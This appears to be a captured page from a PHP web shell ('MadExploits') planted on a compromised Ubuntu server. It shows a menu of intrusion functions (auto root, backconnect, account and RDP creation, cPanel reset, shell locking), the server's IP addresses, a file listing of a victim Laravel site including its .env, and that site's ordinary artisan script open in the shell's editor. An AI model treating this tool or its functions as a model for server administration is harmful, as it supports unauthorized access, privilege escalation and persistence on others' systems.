Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdg.amatya.biz-8 /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxrwxr-x
app
[ DIR ]
drwxrwxr-x
assets
[ DIR ]
drwxrwxr-x
bootstrap
[ DIR ]
drwxrwxr-x
config
[ DIR ]
drwxrwxr-x
database
[ DIR ]
drwxrwxr-x
node_modules
[ DIR ]
drwxrwxr-x
public
[ DIR ]
drwxrwxr-x
resources
[ DIR ]
drwxrwxr-x
routes
[ DIR ]
drwxrwxr-x
storage
[ DIR ]
drwxrwxr-x
stubs
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
vendor
[ DIR ]
drwxrwxr-x
.env
962
B
-rw-rw-r--
.gitignore
1.06
KB
-rw-rw-r--
2023_08_16_080428_create_renta...
176
B
-rw-rw-r--
README.md
460
B
-rw-rw-r--
artisan
1.65
KB
-rwxrwxr-x
composer.json
2.01
KB
-rw-rw-r--
composer.lock
332.1
KB
-rw-rw-r--
package-lock.json
428.19
KB
-rw-rw-r--
package.json
557
B
-rw-rw-r--
phpunit.xml
1.17
KB
-rw-rw-r--
server.php
563
B
-rw-rw-r--
webpack.mix.js
594
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : artisan
#!/usr/bin/env php <?php define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader | for our application. We just need to utilize it! We'll require it | into the script here so that we do not have to worry about the | loading of any our classes "manually". Feels great to relax. | */ require __DIR__.'/vendor/autoload.php'; $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Artisan Application |-------------------------------------------------------------------------- | | When we run the console application, the current CLI command will be | executed in this console and the response sent back to a terminal | or another output device for the developers. Here goes nothing! | */ $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running, we will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);
Close